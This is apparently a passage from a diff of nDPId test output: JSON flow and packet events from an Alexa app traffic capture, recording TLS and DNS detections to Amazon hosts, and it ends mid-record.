+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1490976091219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976091219,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo0alAAEAGEv+sECrYNudIWKNdAbtkFLBJe5WfNFAQAVeEFQAA"} +00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976090991,"flow_last_seen":1490976091345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976091345,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01339{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1456,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976090991,"flow_last_seen":1490976091346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2942,"flow_avg_l4_payload_len":367,"midstream":0,"thread_ts_msec":1490976091346,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093238,"flow_last_seen":1490976093238,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976093238,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1490976093238,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1490976093238,"pkt":"AMDKkaPvePiC0\/vCCABFAABEWltAAEARM1SsECrYrBAqAaKnADUAMOTtwQkBAAABAAAAAAAAC2RwLWd3LW5hLWpzBmFtYXpvbgNjb20AAAEAAQ=="} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093238,"flow_last_seen":1490976093238,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976093238,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1496,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1490976093355,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1490976093355,"pkt":"ePiC0\/vCAMDKkaPvCABFAABr3WJAAEARsCWsECoBrBAq2AA1oqcAV3huwQmBgAABAAIAAAAAC2RwLWd3LW5hLWpzBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAIQACwhkcC1ndy1uYcAYwDQAAQABAAAAFAAEsCBlNA=="} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1496,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976093355,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"176.32.101.52"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1497,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093358,"flow_last_seen":1490976093358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976093358,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1497,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1490976093358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976093358,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88bJAAEAGXMysECrYsCBlNKvhAbv82ZN1AAAAAKAC\/\/+6GAAAAgQFtAQCCAoA9mLHAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1490976093481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976093481,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwL+xAAOcGd56wIGU0rBAq2AG7q+GBdUC1\/NmTdnASH\/53tgAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1490976093486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976093486,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8bNAAEAGXN+sECrYsCBlNKvhAbv82ZN2gXVAtlAQAVfCJwAA"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1504,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976093358,"flow_last_seen":1490976093491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976093491,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01451{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976093358,"flow_last_seen":1490976093953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3594,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1490976093953,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","server_names":"dp-gw-na.amazon.com,dp-gw-na-js.amazon.com,dp-gw-na.amazon.co.uk,dp-gw-na.amazon.de,dp-gw-na.amazon.co.jp,dp-gw-na.amazon.in","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=dp-gw-na.amazon.com","fingerprint":"27:E5:06:34:82:69:BC:97:5E:28:A3:C1:5A:23:81:C7:E3:28:95:8C"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1497,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093358,"flow_last_seen":1490976093358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976093358,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1497,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1490976093358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976093358,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88bJAAEAGXMysECrYsCBlNKvhAbv82ZN1AAAAAKAC\/\/+6GAAAAgQFtAQCCAoA9mLHAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1490976093481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976093481,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwL+xAAOcGd56wIGU0rBAq2AG7q+GBdUC1\/NmTdnASH\/53tgAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1490976093486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976093486,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8bNAAEAGXN+sECrYsCBlNKvhAbv82ZN2gXVAtlAQAVfCJwAA"} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1504,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976093358,"flow_last_seen":1490976093491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976093491,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01451{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976093358,"flow_last_seen":1490976093953,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3594,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1490976093953,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","server_names":"dp-gw-na.amazon.com,dp-gw-na-js.amazon.com,dp-gw-na.amazon.co.uk,dp-gw-na.amazon.de,dp-gw-na.amazon.co.jp,dp-gw-na.amazon.in","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=dp-gw-na.amazon.com","fingerprint":"27:E5:06:34:82:69:BC:97:5E:28:A3:C1:5A:23:81:C7:E3:28:95:8C"}} 00191{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1524,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976094729} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":1524,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976094725,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1586,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976088937,"flow_last_seen":1490976099286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":802,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976099286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100559,"flow_last_seen":1490976100559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100559,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1490976100559,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100559,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgZAAEAGAiWsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pqQAAAgQFtAQCCAoA9mWXAAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100811,"flow_last_seen":1490976100811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1490976100811,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100811,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BwBAAEAGDSusECrYNu8YuoUaAbt\/SWKxAAAAAKAC\/\/9R9gAAAgQFtAQCCAoA9mWxAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1604,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100859,"flow_last_seen":1490976100859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100859,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1604,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1490976100859,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100859,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8OO5AAEAGq6asECrYNudIWKNhAbuICV1bAAAAAKAC\/\/8AqwAAAgQFtAQCCAoA9mW1AAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1606,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1490976100998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976100998,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw6qtAAOcGgoo27xi6rBAq2AG7hRpDnUSYf0lisnASH\/5McwAAAgQFtAEDAwY="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1607,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1490976100999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976100999,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0s4IAACcGiho250hYrBAq2AG7o2ETwX1YiAldXIAS\/\/\/2XwAAAgQFmAMDCAEEAgEB"} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1608,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1490976100999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976100999,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBwFAAEAGDT6sECrYNu8YuoUaAbt\/SWKyQ51EmVAQAVeW5AAA"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1609,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1490976101000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976101000,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoOO9AAEAGq7msECrYNudIWKNhAbuICV1cE8F9WVAQAVc8uQAA"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1610,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100811,"flow_last_seen":1490976101001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100859,"flow_last_seen":1490976101001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976100811,"flow_last_seen":1490976101100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976101100,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976100859,"flow_last_seen":1490976101182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":339,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976101182,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01340{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100859,"flow_last_seen":1490976101183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2974,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976101183,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 